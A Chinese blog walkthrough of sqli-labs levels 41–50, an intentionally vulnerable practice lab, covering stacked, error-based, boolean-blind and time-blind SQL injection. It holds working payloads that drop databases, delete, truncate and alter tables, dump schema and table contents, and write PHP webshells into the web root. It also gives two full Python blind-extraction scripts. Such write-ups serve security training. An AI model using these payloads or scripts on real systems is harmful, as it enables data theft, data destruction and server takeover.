主頁 >  其他 > sqli-labs通關(less41~less50)

sqli-labs通關(less41~less50)

2021-09-18 11:48:01 其他

目錄

Less41

Less42

Less43

Less44

Less45

Less46

Less47

Less48

Less49

Less50


Less41

這關和Less40差不多,先通過布爾盲注來找到閉合,然后就肆無忌憚堆疊注入了,

找閉合:

http://192.168.101.16/sqli-labs-master/Less-41/?id=1  有查詢結果

http://192.168.101.16/sqli-labs-master/Less-41/?id=1'  無查詢結果

http://192.168.101.16/sqli-labs-master/Less-41/?id=1" 無查詢結果

http://192.168.101.16/sqli-labs-master/Less-41/?id=1-- s 有查詢結果

不需要閉合(我可太喜歡這關的粉色了)

這關用堆疊注入刪掉xiannv資料庫的xiang表:

http://192.168.101.16/sqli-labs-master/Less-41/?id=1;drop table xiannv.xiang-- s

資料庫上可以看到xiannv資料庫已經沒有xiang表了

這關代碼也和前幾關同樣是堆疊注入的差不多,不看了

Less42

幾個鏈接翻了一圈,只有http://192.168.101.16/sqli-labs-master/Less-42/index.php有輸入框

注意下面用hackbar進行sql注入的時候,hackbar的url欄需要填:

http://192.168.101.16/sqli-labs-master/Less-42/login.php

因為資料是提交到login.php的,網頁有提交資料時跳轉的功能,hackbar可沒有

Post data分別輸入以下兩條payload,測驗Username輸入框是否有報錯注入點:

login_user=admin'&login_password=pass&mysubmit=Login

login_user=admin"&login_password=pass&mysubmit=Login

兩次結果是一樣的,都是下圖這樣,沒有報錯,也沒登錄成功

Post data分別輸入以下兩條payload,測驗Password輸入框是否有報錯注入點:

login_user=admin&login_password=pass'&mysubmit=Login

login_user=admin&login_password=pass"&mysubmit=Login

加單引號那條(第一條),有回顯下圖所示的sql語法錯誤,從報錯資訊看,閉合是單引號

上一關把xiannv資料庫的xiang表刪掉了,這關把xiannv資料庫刪掉

Post data輸入:

login_user=admin&login_password=pass';drop database xiannv#&mysubmit=Login

服務器上navicat關閉連接重新再連一下,發現左側資料庫串列已經沒有xiannv資料庫了

下面分析一下代碼:

這關表單資料提交到login.php

追到login.php看一下,login_user的值用mysqli_real_escape_string()轉義特殊字符了,而且這關又不符合寬位元組注入的條件,因此username的單引號沒法閉合,而login_password的值不經處理代入sql陳述句,可以閉合單引號,帶入后面增加的sql陳述句,

Less43

和上一關差不多,就閉合不同罷了……

重申一遍,用hackbar注入的話,hackbar的地址欄要填:

http://192.168.101.16/sqli-labs-master/Less-43/login.php

也就是表單提交的目標頁面

照著上一關的套路找閉合,試到

login_user=admin&login_password=pa'&mysubmit=Login

的時候通過回顯的sql語法錯誤發現閉合是')

接下來就是為所欲為的時候了,由于之前通過堆疊注入創建的測驗用的資料庫已經在前幾關折騰光了,這關我先手工在服務器上創建個測驗用的資料庫,然后再繼續折騰它,

如下圖所示,我建了個earth資料庫plant表,里面有三行資料,分別是三種花花的名字

然后在hackbar的Post data中輸入:

login_user=admin&login_password=pa');delete from earth.plant#&mysubmit=Login

再看服務器上,plant表中的花花都被拔光了

注意:由于堆疊注入兩條陳述句的結果是分開的,在一些代碼邏輯下(比如本關),只有第一條陳述句錯誤的情況下才會報sql錯誤,如果第一條陳述句正確,第二條陳述句就算有錯誤也不會在頁面回顯,

代碼沒啥好說的,和上關原理是一樣的,就是閉合多個括號,另外從代碼邏輯可以看出來,本關報不報sql語法錯誤是根據第一條陳述句有沒有執行成功來判斷的,第一條陳述句執行成功了,第二條就算失敗也不會報錯,

Less44

這關其實也沒有太大變化,變化主要是在找閉合這步,這關不再報sql語法錯誤了,所以需要用布爾盲注的方法去找閉合,

具體來說,就本靶場而言,當Less42中的4條找閉合的payload發送后,頁面都不報sql語法錯誤的話,就說明頁面不會回顯sql語法錯誤,

盲注找閉合的方法其實也很簡單,像本關這樣兩個輸入框的正確值都不知道的情況下,在普通找閉合的payload中閉合符號之后增加 or 1=1#就行,如果回傳的頁面顯示登錄成功,說明閉合成功,

用hackbar向http://192.168.101.16/sqli-labs-master/Less-44/login.php發送如下payload檢查username輸入框是否有注入點

login_user=admin' or 1=1#&login_password=pass&mysubmit=Login

login_user=admin" or 1=1#&login_password=pass&mysubmit=Login

頁面回顯都是下圖這樣登錄失敗的頁面,username輸入框沒找到注入點

用hackbar向http://192.168.101.16/sqli-labs-master/Less-44/login.php發送如下payload檢查password輸入框是否有注入點

login_user=admin&login_password=pass" or 1=1#&mysubmit=Login

login_user=admin&login_password=pass' or 1=1#&mysubmit=Login

第一潭訓是顯示登錄失敗的頁面,但第二條顯示了登錄成功的頁面

接下來就是堆疊注入的部分了,我們來堆一下:

還是上關那張表,我又手工寫了一條記錄進去

然后在hackbar中向http://192.168.101.16/sqli-labs-master/Less-44/login.php發送以下payload,洗掉表earth.plant中的資料

login_user=admin&login_password=pass';truncate table earth.plant#&mysubmit=Login

再到服務器上看,重繪以下plant表的顯示,發現表中的資料已經被洗掉了

本關代碼和Less42的代碼大體上是一致的,只是第一條陳述句執行失敗時不再報sql語法錯誤,所以代碼就不截圖咯,

Less45

這關和上一關的區別是閉合不同,按照上一關找閉合的套路走一遍(當然由于閉合不同,上一關的payload都是無法回傳登錄成功頁面的),

當hackbar向http://192.168.101.16/sqli-labs-master/Less-45/login.php提交payload:

login_user=admin&login_password=pass') or 1=1#&mysubmit=Login

時,回傳了登錄成功的頁面

然后就到了想想這關干嘛的環節,想了一會兒,決定這關給earth.plant加一列,

用hackbar向http://192.168.101.16/sqli-labs-master/Less-45/login.php提交payload:

login_user=admin&login_password=pass');alter table earth.plant add column num int(10)#&mysubmit=Login

到服務器上一看,earth.plant增加了一個名為num的列(欄位)

Less46

試試sort值分別取1,2,3,就能發現,這關的引數是order by后面的值,也就是說,這關的sort引數值表示根據表的哪一列來排列查詢結果

http://192.168.101.16/sqli-labs-master/Less-46/?sort=1
http://192.168.101.16/sqli-labs-master/Less-46/?sort=2
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3

比如下圖sort的值為3,表示根據第三列,也就是PASSWORD的大小來排序查詢結果

order by后面是不能接union select的,可以試試不會不報sql語法錯誤,如果會報,就可以用報錯注入,

地址欄輸入 :http://192.168.101.16/sqli-labs-master/Less-46/?sort=3'

報了sql語法錯誤,根據報錯資訊,本關無閉合符號,

下面就可以用報錯注入的方法來爆資料了:

#獲取服務器上所有資料庫的名稱
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),32,31),0x7e),1)
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),63,31),0x7e),1)
#獲取pikachu資料庫的所有表名稱
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3 and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31),0x7e),1)
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3  and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),32,31),0x7e),1)
#獲取pikachu資料庫message表的所有列名稱
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3  and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='message'),1,31),0x7e),1)
#獲取pikachu資料庫message表的id和content列的所有值
http://192.168.101.16/sqli-labs-master/Less-46/?sort=3  and updatexml(1,concat(0x7e,substr((select group_concat(concat(id,'^',content)) from pikachu.message),1,31),0x7e),1)

最終結果

寫webshell可以用下面的payload:

http://192.168.101.16/sqli-labs-master/Less-46/?sort=3 limit 0,1  into outfile 'C:/phpstudy_pro/WWW/46.php' lines terminated by 0x3C3F7068702061737365727428245F504F53545B6C65737334365D293B3F3E

lines terminated by xxx是在查詢結果每一行后面加上xxx,所以payload中加了limit 0,1限制查詢結果僅取第一行,

服務器上被寫入的webshell

重要題外話:

我原本以為這關只要sort不存在的列,連接符就可以是or,但事實上并不是這樣,

為了方便理解,我直接在服務器上的navicat演示:

當查詢是:SELECT * FROM users ORDER BY 4

回傳結果報錯,不存在第4列

當查詢是:

SELECT * FROM users ORDER BY 4 or updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)

竟然輸出了查詢結果,,,并且還是按第一列排序的,,仙女震驚,,,

然后試了一下

SELECT 4 or updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)

果不其然,結果是1

根據我的推測,結果是一個布林值,不為0的數都為真,這里4已經為真,所以就引發了短路,or后面的陳述句就不執行了,

根據這個推測,可以得到兩個資訊:

(1)updatexml的報錯是sql陳述句執行程序中的報錯,即執行到它才會報錯

(2)如果ORDER BY 0就可以用or作為連接符

試一下:

SELECT * FROM users ORDER BY 0 or updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)

OK,計劃通~

本關代碼倒是沒啥,注意一下入參在sql查詢中的位置就好

Less47

和上一關基本一樣,就閉合不同

地址欄輸入:http://192.168.101.16/sqli-labs-master/Less-47/?sort=1'

從報錯可知閉合是單引號

爆資料的payload如下:

#獲取服務器上所有資料庫的名稱
http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),32,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),63,31),0x7e),1)-- s
#獲取pikachu資料庫的所有表名稱
http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),32,31),0x7e),1)-- s
#獲取pikachu資料庫message表的所有列名稱
http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='message'),1,31),0x7e),1)-- s
#獲取pikachu資料庫message表的id和content列的所有值
http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(id,'^',content)) from pikachu.message),1,31),0x7e),1)-- s

最終結果:

寫webshell的payload如下:

 http://192.168.101.16/sqli-labs-master/Less-47/?sort=1' limit 0,1  into outfile 'C:/phpstudy_pro/WWW/47.php' lines terminated by 0x3C3F7068702061737365727428245F504F53545B6C65737334375D293B3F3E -- s

服務器上寫入的webshell:

本關代碼和上一關就sql陳述句中引數的閉合符不同,不多說了

Less48

(本關找通關方法的分析部分比較多,覺得煩的話可以直接拉到最下面)

地址欄輸入http://192.168.101.16/sqli-labs-master/Less-48/?sort=1

回傳正確的查詢結果

地址欄輸入:

http://192.168.101.16/sqli-labs-master/Less-48/?sort=1'

http://192.168.101.16/sqli-labs-master/Less-48/?sort=1"

沒有查詢結果回傳

從以上操作結果可知:

(1)本關是數字型,無閉合

(2)本關不能報錯注入,但可以布爾盲注

下面我又得改我的python腳本了……本來打算改成跟原來的差不多的and/or xxx形式的payload,發現不行啊……到服務器上用navicat試了一下,結果發現下面幾條陳述句都有相同的查詢結果

SELECT * FROM users ORDER BY 3 and 0
SELECT * FROM users ORDER BY 3 and 1
SELECT * FROM users ORDER BY 3 or 0
SELECT * FROM users ORDER BY 3 or 1

查詢結果都是

看來此路不通啊

突然想起來之前webgoat里面好像遇到過這種情況 WebGoat (A1) SQL Injection (mitigation)_箭雨鏡屋-CSDN博客

于是我又在navicat上試了一下,下面兩條查詢陳述句回傳的結果都是和上圖一樣的,仙女無語

SELECT * FROM users ORDER BY (CASE WHEN (1) THEN 1 ELSE 2 END) 
SELECT * FROM users ORDER BY (CASE WHEN (0) THEN 1 ELSE 2 END) 

不過仙女又想,THEN和ELSE后面換成列名稱又如何呢?果然

SELECT * FROM users ORDER BY (CASE WHEN (1) THEN id ELSE username END) 

的查詢結果是按id排序的

SELECT * FROM users ORDER BY (CASE WHEN (0) THEN id ELSE username END) 

查詢結果是按username排序的

也就是說,我要用這個方法的話,我還得先知道列名稱……仙女再次無語(后來想想……網頁回顯了列名了,其實這種方法是可以的,失策失策)

百度了一下,發現注入點在order by的時候還能用rand()函式來盲注,還是先在navicat上試試

確實rand(0)和rand(1)的查詢結果不一樣,此路通

為了腳本識別方便,結尾再加個limit 0,1只保留第一行結果,

本關通關用的思路大概是讓python腳本識別SELECT * FROM users ORDER BY rand(1) limit 0,1與SELECT * FROM users ORDER BY rand(0) limit 0,1的查詢結果的不同,

來看看最終的成果吧

#!/usr/bin/python3
# coding=utf-8
 
"""
functions for boolean-based sql injection(GET)
:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
 
import requests
 
url = "http://192.168.101.16/sqli-labs-master/Less-48/"               #有可利用漏洞的url,根據實際情況填寫
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",}    #http request報文頭部,根據實際情況填寫
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括數字、大小寫字母、可見特殊字符
flag = 'admin3'                                        #用于判斷附加sql陳述句為真的字符,根據網頁回顯填寫
 
def Database48():
    n = 100                                                                     #預測當前資料庫名稱最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j<n and j-k>3:
            payload1 = "rand(length((select group_concat(schema_name) from information_schema.schemata))>"+str(j)+") limit 0,1-- s"           #所有payload根據實際情況填寫
            param = {
            "sort":payload1,
            }
            response = requests.get(url, params = param, headers = headers)     #GET方法發送含payload的request
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload2 = "rand(length((select group_concat(schema_name) from information_schema.schemata))="+str(i)+") limit 0,1-- s"
                param = {
                "sort":payload2,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all databases contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload3 = "rand(substr((select group_concat(schema_name) from information_schema.schemata),"+str(i)+",1)='"+c+"') limit 0,1-- s"
            param = {
            "sort":payload3,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                db = db+c
                break
    print("the name of all databases is "+str(db))
    
def Tables48(database):
    n = 100                                                                     #預測當前資料庫中所有表名稱最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2
    length = 0
    tname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload4 = "rand(length((select group_concat(table_name) from information_schema.tables where table_schema = '"+database+"'))>"+str(j)+") limit 0,1-- s"
            param = {
            "sort":payload4,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload5 = "rand(length((select group_concat(table_name) from information_schema.tables where table_schema = '"+database+"'))="+str(i)+") limit 0,1-- s"
                param = {
                "sort":payload5,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all tables contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload6 = "rand(substr((select group_concat(table_name) from information_schema.tables where table_schema = '"+database+"'),"+str(i)+",1)='"+c+"') limit 0,1-- s"
            param = {
            "sort":payload6,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                tname = tname+c
                break
    print("the name of all tables is "+str(tname))
 
 
def Columns48(database,table):                                                          #table引數是需要爆破的資料表名稱,記得加單引號
    n = 200                                                                     #預測某個表所有列名稱最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2
    length = 0
    cname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload7 = "rand(length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"' and table_schema = '"+database+"'))>"+str(j)+") limit 0,1-- s"
            param = {
            "sort":payload7,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload8 = "rand(length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"' and table_schema = '"+database+"'))="+str(i)+") limit 0,1-- s"
                param = {
                "sort":payload8,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all columns in current table contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload9 = "rand(substr((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"' and table_schema = '"+database+"'),"+str(i)+",1)='"+c+"') limit 0,1-- s"
            param = {
            "sort":payload9,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                cname = cname+c
                break
    print("the name of all columns in current table is "+str(cname))
 
def Content48(database,table,col1,col2):                                                #table引數是需要爆破的資料表名稱,col1和col2是需要爆破內容的列,記得都要加單引號
    n = 200                                                                     #預測期望獲取的資料的最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2
    length = 0
    content = str()
    while True:
        if j>k and j<n and j-k>3:
            payload10 = "rand(length((select group_concat(concat("+col1+",'^',"+col2+")) from "+database+"."+table+"))>"+str(j)+") limit 0,1-- s"
            param = {
            "sort":payload10,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload11 = "rand(length((select group_concat(concat("+col1+",'^',"+col2+")) from "+database+"."+table+"))="+str(i)+") limit 0,1-- s"
                param = {
                "sort":payload11,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the content contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload12 = "rand(substr((select group_concat(concat("+col1+",'^',"+col2+")) from "+database+"."+table+"),"+str(i)+",1)='"+c+"') limit 0,1-- s"
            param = {
            "sort":payload12,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                content = content+c
                break
    print("the content is "+str(content))

測驗結果

源代碼就不分析了,無非就是去掉了print_r(mysql_error());的LESS46

Less49

首先還是判斷一下是否有閉合,分別輸入下面的payload:

http://192.168.101.16/sqli-labs-master/Less-49/?sort=1"
http://192.168.101.16/sqli-labs-master/Less-49/?sort=1'

發現第一條payload(雙引號)回傳正確查詢結果

第二條payload(單引號)不回傳查詢結果

由此可見,閉合包含單引號,再用以下payload驗證以下,閉合是否是單引號

http://192.168.101.16/sqli-labs-master/Less-49/?sort=1'-- s

回傳正確查詢結果,說明閉合是單引號

想看看能不能布爾盲注,于是嘗試了下面兩組payload

http://192.168.101.16/sqli-labs-master/Less-49/?sort=1' and rand(1)-- s
http://192.168.101.16/sqli-labs-master/Less-49/?sort=1' and rand(0)-- s
http://192.168.101.16/sqli-labs-master/Less-49/?sort=rand(1)' -- s
http://192.168.101.16/sqli-labs-master/Less-49/?sort=rand(0)' -- s

第一組兩個payload都回傳下圖結果,沒有區別(我也沒看明白這到底是按照什么排序的……)

第二組兩個payload都回傳下圖結果,沒有區別(其實實際情況下應該不會order by后面接引號,因為要么是列數,要么是列名,都不需要引號,并且其實引號內是任意字符結果都是一樣的,

看來這關是沒法布爾盲注了……只能試試痛苦的時間盲注

輸入下面兩條payload,發現第一條payload回顯無時延,第二條有時延,這里sleep(0.1)是因為sql查詢回傳值行數太多了,每一行都會sleep,因此值設定小一點,總量還是有1.5s左右的

http://192.168.101.16/sqli-labs-master/Less-49/?sort=1' and if(0,sleep(0.1),1) -- s
http://192.168.101.16/sqli-labs-master/Less-49/?sort=1' and if(1,sleep(0.1),1) -- s

下面我就把我之前寫的時間盲注的腳本改改吧……痛苦……

# !/usr/bin/python3
# coding=utf-8

"""
functions for time-based sql injection(blind)

:copyright: Copyright (c) 2019, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests

url = "http://192.168.101.16/sqli-labs-master/Less-49/"               #有可利用漏洞的url,根據實際情況填寫
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",}    #http request報文頭部,根據實際情況填寫

keylist = [chr(i) for i in range(33, 127)]                                     #包括數字、大小寫字母、可見特殊字符

def Database49():
    n = 100                                                                      #預測當前資料庫名稱最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j<n and j-k>3:
            payload1 = "1' and  if(length((select group_concat(schema_name) from information_schema.schemata))>"+str(j)+",sleep(0.1),1)-- ss"           #所有payload根據實際情況填寫
            param = {
            "sort":payload1,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)     #本腳本根據GET型注入撰寫,遇到POST型可修改改行方法和引數,其他所有函式中同樣
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload2 = "1' and  if(length((select group_concat(schema_name) from information_schema.schemata))="+str(i)+",sleep(0.1),1)-- ss"
                param = {
                "sort":payload2,
                }
                try:
                    response = requests.get(url, params = param, headers = headers,timeout=1)
                except:
                    length = i
                    break
            break
        else:
            break
    print("the name of all databases contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload3 = "1' and if(substr((select group_concat(schema_name) from information_schema.schemata),"+str(i)+",1)='"+c+"',sleep(0.1),1)-- ss"
            param = {
            "sort":payload3,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)
            except:
                db = db+c
                break
    print("the name of all databases is "+str(db))
    
def Tables49(database):
    n = 100                                                                     #預測當前資料庫中所有表名稱最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2
    length = 0
    tname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload4 = "1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema = '"+database+"'))>"+str(j)+",sleep(0.1),1)-- ss"
            param = {
            "sort":payload4,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)     #本腳本根據GET型注入撰寫,遇到POST型可修改改行方法和引數,其他所有函式中同樣
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload5 = "1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema = '"+database+"'))="+str(i)+",sleep(0.1),1)-- ss"
                param = {
                "sort":payload5,
                }
                try:
                    response = requests.get(url, params = param, headers = headers,timeout=1)
                except:
                    length = i
                    break
            break
        else:
            break
    print("the name of all tables contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload6 = "1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema = '"+database+"'),"+str(i)+",1)='"+c+"',sleep(0.1),1)-- ss"
            param = {
            "sort":payload6,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)
            except:
                tname = tname+c
                break
    print("the name of all tables is "+str(tname))


def Columns49(database,table):
    n = 200                                                                     #預測某個表所有列名稱最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2
    length = 0
    cname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload7 = "1' and if(length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"' and table_schema = '"+database+"'))>"+str(j)+",sleep(0.1),1)-- ss"
            param = {
            "sort":payload7,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)     #本腳本根據GET型注入撰寫,遇到POST型可修改改行方法和引數,其他所有函式中同樣
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload8 = "1' and if(length((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"' and table_schema = '"+database+"'))="+str(i)+",sleep(0.1),1)-- ss"
                param = {
                "sort":payload8,
                }
                try:
                    response = requests.get(url, params = param, headers = headers,timeout=1)
                except:
                    length = i
                    break
            break
        else:
            break
    print("the name of all columns in current table contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload9 = "1' and if(substr((select group_concat(column_name) from information_schema.columns where table_name = '"+table+"' and table_schema = '"+database+"'),"+str(i)+",1)='"+c+"',sleep(0.1),1)-- ss"
            param = {
            "sort":payload9,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)
            except:
                cname = cname+c
                break
    print("the name of all columns in current table is "+str(cname))

def Content49(database,table,col1,col2):
    n = 200                                                                     #預測期望獲取的資料的最大可能的長度,根據實際情況填寫
    k = 0
    j = n//2
    length = 0
    content = str()
    while True:
        if j>k and j<n and j-k>3:
            payload10 = "1' and if(length((select group_concat(concat("+col1+",'^',"+col2+")) from "+database+"."+table+"))>"+str(j)+",sleep(0.1),1)-- ss"
            param = {
            "sort":payload10,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)     #本腳本根據GET型注入撰寫,遇到POST型可修改改行方法和引數,其他所有函式中同樣
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload11 = "1' and if(length((select group_concat(concat("+col1+",'^',"+col2+")) from "+database+"."+table+"))="+str(i)+",sleep(0.1),1)-- ss"
                param = {
                "sort":payload11,
                }
                try:
                    response = requests.get(url, params = param, headers = headers,timeout=1)
                except:
                    length = i
                    break
            break
        else:
            break
    print("the content contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload12 = "1' and if(substr((select group_concat(concat("+col1+",'^',"+col2+")) from "+database+"."+table+"),"+str(i)+",1)='"+c+"',sleep(0.1),1)-- ss"
            param = {
            "sort":payload12,
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=1)
            except:
                content = content+c
                break
    print("the content is "+str(content))

測驗結果

這關源代碼也不分析了,和上一關差不多,就是sql查詢陳述句有個畫蛇添足的單引號閉合,

Less50

瀏覽器地址欄輸入下面兩個url都會報sql語法錯誤,可見本關不需要閉合

http://192.168.101.16/sqli-labs-master/Less-50/?sort=1"
http://192.168.101.16/sqli-labs-master/Less-50/?sort=1'

這關說是堆疊注入,那就用堆疊注入寫個webshell好了,payload如下:

http://192.168.101.16/sqli-labs-master/Less-50/?sort=1;select '<?php assert($_POST[less50]);?>' into outfile 'C:/phpstudy_pro/WWW/less50.php'

服務器上寫入的webshell

本關代碼就不展示了,是order by注入關卡(比如Less46)和堆疊注入關卡的合體,和堆疊注入關卡一樣,只能顯示第一條sql陳述句的結果,也只有第一條陳述句有問題的時候會報語法錯誤;因此爆資料的操作還是得靠報錯注入,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/300967.html

標籤:其他

上一篇:超詳細解讀RSA加密---數學定理、證明及應用

下一篇:計算機網路(2)_物理層

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

